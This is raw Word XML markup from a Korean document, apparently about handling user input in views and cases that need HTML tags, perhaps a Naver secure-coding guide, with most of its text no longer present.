    <w:p w14:paraId="6975B35C" w14:textId="77777777"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14:paraId="636EC53C" w14:textId="77777777" w:rsidR="00431F07" w:rsidRPr="00431F07" w:rsidRDefault="00431F07" w:rsidP="00431F07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B916F75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14:paraId="056D9B1F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lastRenderedPageBreak/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r w:rsidR="003F170A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>네이버의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14:paraId="58E4AFE7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14:paraId="583D213C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14:paraId="3C30DF5A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14:paraId="39F55065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14:paraId="1319FE39" w14:textId="77777777"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14:paraId="673A87C7" w14:textId="77777777"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9476"/>
      </w:tblGrid>
      <w:tr w:rsidR="00431F07" w14:paraId="0DBD6911" w14:textId="77777777" w:rsidTr="005904AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10682" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="4B77CA8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DA1E38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56A2924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35D183C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1B964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03F284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14:paraId="11F7F29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7021A44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14:paraId="55A82CD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FCBFEB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14:paraId="3FF722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14:paraId="06FCCD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2B6B735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54339B8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14:paraId="5AE17CB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77AD5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14:paraId="5E66C29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14:paraId="27453D7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14:paraId="26546AD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0F941ED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14:paraId="4070CCD1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14:paraId="426E412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1AC70742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14:paraId="606E336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14:paraId="7EB6309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72B93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23955C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C9C1CA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3C04852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14:paraId="1474AFB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B84C53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0F8E6D0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65F9792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AA0F0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4D0E95E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14:paraId="439947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A5FE81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7C57297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36DFCBF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14:paraId="42A1CDF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5467CF9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D933FD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50554E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3897F3E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387566D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0AF6681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14:paraId="2A0355F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D053C3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2CE319B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1F5F3DC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3D0E3A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FB9CBD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14:paraId="35CDD8F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350937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3DAC872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1ECAE60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14:paraId="68E746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B92140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7E17606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61DA46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14:paraId="37D8E97B" w14:textId="77777777" w:rsidTr="00684E4C">
        <w:trPr>
          <w:trHeight w:val="1374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36746195" w14:textId="77777777"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476" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29D051A5" w14:textId="77777777"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C0540" wp14:editId="6BB24D8D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1D28D" w14:textId="77777777"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14:paraId="6A772DE8" w14:textId="77777777"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14:paraId="79291071" w14:textId="77777777"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14:paraId="3768C639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14:paraId="49894642" w14:textId="77777777" w:rsidR="00B659BD" w:rsidRPr="00B659BD" w:rsidRDefault="00B659BD" w:rsidP="00B659BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">사용자 입력 값이 뷰에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14:paraId="32592BBE" w14:textId="77777777" w:rsidR="00437072" w:rsidRDefault="00437072" w:rsidP="00431F07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21EFE2BB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HTML 태그 사용이 필요한 경우</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD9D716" w14:textId="77777777"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14:paraId="621D0E7A" w14:textId="77777777" w:rsidR="004F296A" w:rsidRDefault="004F296A" w:rsidP="00B659BD"/>
    <w:p w14:paraId="0FC153F6" w14:textId="77777777"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14:paraId="06BEBE97" w14:textId="77777777"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14:paraId="5EA25F80" w14:textId="77777777"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Malgun Gothic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651C3419"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15F6C14E"/>
    <w:lvl w:ilvl="0" w:tplc="3F88CD4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CEE3734"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD787522"/>
    <w:lvl w:ilvl="0" w:tplc="44888C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02704B"/>
    <w:rsid w:val="00070285"/>
    <w:rsid w:val="00096F6F"/>
    <w:rsid w:val="00182BCA"/>
    <w:rsid w:val="002955C1"/>
    <w:rsid w:val="002C1CD1"/>
    <w:rsid w:val="00373126"/>
    <w:rsid w:val="00394687"/>
    <w:rsid w:val="003B5583"/>
    <w:rsid w:val="003C4836"/>
    <w:rsid w:val="003F170A"/>
    <w:rsid w:val="00431F07"/>
    <w:rsid w:val="00437072"/>
    <w:rsid w:val="00496245"/>
    <w:rsid w:val="004A0620"/>
    <w:rsid w:val="004F296A"/>
    <w:rsid w:val="005904AE"/>
    <w:rsid w:val="005C1003"/>
    <w:rsid w:val="00684E4C"/>
    <w:rsid w:val="0069772D"/>
    <w:rsid w:val="008827C8"/>
    <w:rsid w:val="008B2D11"/>
    <w:rsid w:val="008C3A40"/>
    <w:rsid w:val="008D2128"/>
    <w:rsid w:val="009A2F22"/>
    <w:rsid w:val="009C2CA8"/>
    <w:rsid w:val="009E0257"/>
    <w:rsid w:val="00A62BE3"/>
    <w:rsid w:val="00AD7532"/>
    <w:rsid w:val="00B625F3"/>
    <w:rsid w:val="00B659BD"/>
    <w:rsid w:val="00B813AF"/>
    <w:rsid w:val="00D14A6E"/>
    <w:rsid w:val="00D54CD4"/>
    <w:rsid w:val="00E81139"/>
    <w:rsid w:val="00E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4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D0792-C995-404D-9C22-848C3A61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18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-13T05:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-19T23:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>